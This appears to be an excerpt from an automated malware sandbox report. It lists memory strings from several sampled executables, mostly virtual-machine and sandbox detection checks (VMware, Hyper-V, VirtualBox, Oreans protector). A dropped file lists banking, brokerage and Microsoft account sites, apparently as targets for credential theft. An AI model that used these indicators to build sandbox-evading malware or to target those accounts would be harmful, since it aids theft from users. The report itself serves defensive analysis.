Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000086C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000077C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: EBFBKFBG.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000086C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000077C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000086C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000077C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: EBFBKFBG.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: AFBFHDBKJE.exe, 00000008.00000002.2352184235.00000000002E7000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000A.00000002.3337947357.0000000001107000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000B.00000002.2400723434.0000000001107000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.3033534217.0000000001107000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: EBFBKFBG.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3339390181.00000000018F1000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3339390181.00000000018B1000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: EBFBKFBG.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware'
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWY
Source: 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: EBFBKFBG.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: EBFBKFBG.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: EBFBKFBG.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
